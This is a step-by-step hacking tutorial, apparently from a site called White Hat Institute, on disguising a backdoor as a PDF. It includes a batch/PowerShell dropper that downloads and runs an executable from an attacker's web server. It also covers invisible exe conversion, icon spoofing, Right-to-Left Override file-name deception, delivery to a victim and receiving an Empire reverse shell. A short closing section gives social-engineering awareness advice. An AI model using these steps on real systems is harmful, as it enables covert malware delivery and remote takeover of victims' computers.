White Hat Institute

Embedding malicious payloads into any file types (method-1)

In our previous articles, we showed you how to create windows backdoors with “.bat” extensions.

In this tutorial, we will show you how to change “.bat” files to “.exe” and combine it with a PDF file to make a PDF Trojan document that can get us a reverse shell.

First, we need to download software called “Bat To Exe Converter” and install it on our computer.

malicious payloads

Once the installation is complete double click on it and starts the application.

Embedding malicious payloads 10

Click on the “Open” icon to browse a malicious “.bat” file to convert it to the “.exe” file.

Embedding malicious payloads 11

Then we need to select an “Exe-Format”; this generally depends on the architecture you are targeting to exploit. In this example, our victim’s machine runs on Windows 64 bit, so we selected “64 Bit | Windows (Invisible)”.

Embedding malicious payloads 12

Next, click on the “Convert” tab and select the destination where you want to save the file. Here we kept it in the “var/www/html/Evil-Files” location as “http_empire.exe” file.

Embedding malicious payloads 13

Once our backdoor with the “.exe” extension is ready, now we can create a Trojan file using the simple code below.

@echo off
set files='url1','url2'
powershell “(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}”

In this simple code, we need to substitute the “url1” with the direct link to the PDF file, and “url2” with the direct link to the backdoor file which is located in our web server http://10.10.10.4/Evil-Files/http_empire.exe.”

Embedding malicious payloads 14

Then save the file as “anything.bat” (in this example, we kept it as “hello_world.bat”) and convert the “.bat” extension to “.exe” using the same steps we showed you above.

Embedding malicious payloads 15

To make our Trojan file look convincing, we can add a PDF icon to it during the converting process. To add an icon first, we need to download it from any online source. For this purpose, we used the http://www.iconarchive.com/ website, which contains tons of icons for various file types. Chose the “.ico” file for PDF and download it to your computer. Next in the converter, select the “Exe-Format” type, then check the “Icon” box and search for the PDF icon file that you want to embed into a Trojan file.

Embedding malicious payloads 16

Lastly, convert the file and save it in your web server folder, so it would be easier for us to deliver it to the target machine.

Embedding malicious payloads 17

Now our Trojan is created. Next, we need to rename it using the technique we explained in the previous method, so it looks very legit and convincing.

Embedding malicious payloads 18
Embedding malicious payloads 19

After you find a very nice PDF file name and properly mirror the extensions with the “Right-to-Left Override” character, copy it and rename the “hello_world.exe” file. In this example, we come up with the file name “circumflexe.pdf.”

Embedding malicious payloads 20

Now we need to compress or archive the file and send it to the target computer.

Embedding malicious payloads 21

Before executing this file in the target computer, run the Empire in your terminal and start listening for an incoming connection.

Embedding malicious payloads 22

When the victim downloads the zip file and extracts it, a legitimate PDF file will appear.

Embedding malicious payloads 23

Once the file is executed, it will show straightforward PDF content, but in the background, our backdoor will run and send an attacker a reverse shell connection.

Embedding malicious payloads 24

As you can see, we managed to receive an active connection that we can interact with and exploit much further.

Embedding malicious payloads 25

Criminals use social engineering strategies since it is simpler to abuse your characteristic tendency to trust rather than to find approaches to hack your software. For instance, it is a lot less demanding to trick somebody into giving you their secret key than it is for you to try hacking their secret key (except if the password is extremely weak). It is critical to understand when and when not to trust a person, and the person you are communicating with is who they state they are.

Ask any security expert, and they will reveal to you that the weakest connection in the security chain is the human who acknowledges an individual or situation at face esteem. It doesn’t make a difference how many locks and deadbolts are on your entryways and windows, or if you have alarm frameworks, floodlights, fences with spiked metal, and armed security personnel; if you trust the individual at the door who says he is the pizza guy and you let him in without first verifying whether he is legitimate, you are totally exposed to whatever risk he represents.

It is always a good practice to double-check before you proceed to the next action or execute an unknown file.